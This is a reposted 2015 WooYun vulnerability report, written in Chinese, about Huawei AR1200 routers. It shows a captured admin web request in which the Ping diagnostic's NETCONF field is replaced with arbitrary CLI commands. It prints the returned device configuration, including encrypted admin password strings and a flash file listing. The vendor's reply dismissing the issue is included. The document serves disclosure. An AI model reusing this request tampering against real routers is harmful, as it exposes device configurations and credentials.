华为AR1200系列路由器后台代码任意执行
漏洞概要
缺陷编号:
WooYun-2015-117671
漏洞标题: 华为AR1200系列路由器后台代码任意执行
相关厂商:
华为技术有限公司
漏洞作者:
1c3z
提交时间: 2015-06-02 11:15
公开时间: 2015-06-06 08:14
漏洞类型: 命令执行
危害等级: 中
自评Rank: 8
漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源:
http://www.wooyun.org
Tags标签:
远程命令执行
漏洞详情披露状态:
2015-06-02: 细节已通知厂商并且等待厂商处理中
2015-06-06: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
学校来了一批路由器,不会配,然后测试测试了下
详细说明:
有这么个功能
系统管理 > 诊断 > Ping
抓包
code 区域POST http://192.168.1.119/view/main/config.cgi HTTP/1.1
Host: 192.168.1.119
Connection: keep-alive
Content-Length: 372
Origin: http://192.168.1.119
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/41.0.2272.76 Chrome/41.0.2272.76 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://192.168.1.119/view/main/default.html?Version=1.2
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: HttpWarnFlg=no; AR=AR; ARlanguage=property-zh_CN.js; userName=admin; ResetFlag=0; HttpWarnFlg=no
SessionID=M1iBvH1s0kak71m1qqL4YFpG7iW5dxin&MessageID=280&<rpc message-id="280" xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
<edit-config operation="merge">
<target>
<running/>
</target>
<error-option>stop-on-error</error-option>
<config>
<featurename istop="true" type="cli">
<quit></quit>
<ping>192.168.1.1</ping>
</featurename>
</config>
</edit-config>
</rpc>]]>]]>
把<ping>192.168.1.1</ping>
改为<display>current-configuration</display>
返回内容
code 区域HTTP/1.1 200 OK
Server: AR
Date: tue, 02 jun 2015 10:29:11 GMT
Content-Type: text/xml
Content-Length: 1402
Set-Cookie: HttpWarnFlg=no; AR=AR; ARlanguage=property-zh_CN.js; userName=admin; ResetFlag=0; HttpWarnFlg=no
Connection: Close
<?xml version="1.0"?>
<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="280">
<ok/>
</rpc-reply>
[V200R005C10SPC500]
#
drop illegal-mac alarm
#
wlan ac-global carrier id other ac id 0
#
pki realm default
enrollment self-signed
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password irreversible-cipher %@%@o~ho0DSI#)c&'+VR0uq2.fN8Hp:0#&|@-6h~GlN!:z~CfN;.%@%@
local-user admin privilege level 3
local-user admin service-type telnet web http
#
firewall zone Local
priority 16
#
interface Ethernet0/0/0
#
interface Ethernet0/0/1
#
interface Ethernet0/0/2
#
interface Ethernet0/0/3
#
interface Ethernet0/0/4
#
interface Ethernet0/0/5
#
interface Ethernet0/0/6
#
interface Ethernet0/0/7
#
interface GigabitEthernet0/0/0
#
interface GigabitEthernet0/0/1
ip address 192.168.1.119 255.255.255.0
#
interface Cellular0/0/0
#
interface Cellular0/0/1
#
interface NULL0
#
snmp-agent local-engineid 800007DB0330D17EED3C03
#
http server enable
http secure-server enable
#
user-interface con 0
authentication-mode password
set authentication password cipher %@%@C;@(!jYWE$qrE5"Q`q>7,7x)$I7.F$3jZ'IHQjB"E^|O7x,,%@%@
user-interface vty 0 4
authentication-mode aaa
#
wlan ac
#
voice
#
diagnose
#
return
漏洞证明:
code 区域<dir></dir>
HTTP/1.1 200 OK
Server: AR
Date: tue, 02 jun 2015 10:30:29 GMT
Content-Type: text/xml
Content-Length: 917
Set-Cookie: HttpWarnFlg=no; AR=AR; ARlanguage=property-zh_CN.js; userName=admin; ResetFlag=0; HttpWarnFlg=no
Connection: Close
<?xml version="1.0"?>
<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="280">
<ok/>
</rpc-reply>
Directory of flash:/
Idx Attr Size(Byte) Date Time(LMT) FileName
0 -rw- 304,700 Mar 27 2015 15:22:32 sacrule.dat
1 -rw- 3,850 Jun 02 2015 07:30:07 mon_file.txt
2 -rw- 111,630,208 Jun 11 2014 03:05:56 AR1220F-V200R005C10SPC500.cc
3 -rw- 0 Mar 27 2015 15:21:58 brdxpon_snmp_cfg.efs
4 -rw- 694 Mar 30 2015 15:25:26 vrpcfg.zip
5 -rw- 396 Mar 30 2015 15:25:26 private-data.txt
6 drw- - Jun 11 2014 12:28:36 dhcp
7 drw- - Jun 11 2014 12:28:38 security
8 -rw- 1,260 Jun 11 2014 12:29:28 rsa_host_key.efs
9 -rw- 540 Jun 11 2014 12:29:32 rsa_server_key.efs
510,484 KB total (401,132 KB free)
修复方案:
你们更专业。。
版权声明:转载请注明来源
1c3z@
乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-06-06 08:14
厂商回复:感谢白帽子对华为公司安全的关注。经确认,该权限为登录用户默认权限。并非漏洞。
最新状态:暂无
[
本帖最后由 linda 于 2015-10-28 17:25 编辑 ]
搜索更多相关主题的帖子:
华为 路由器 远程命令执行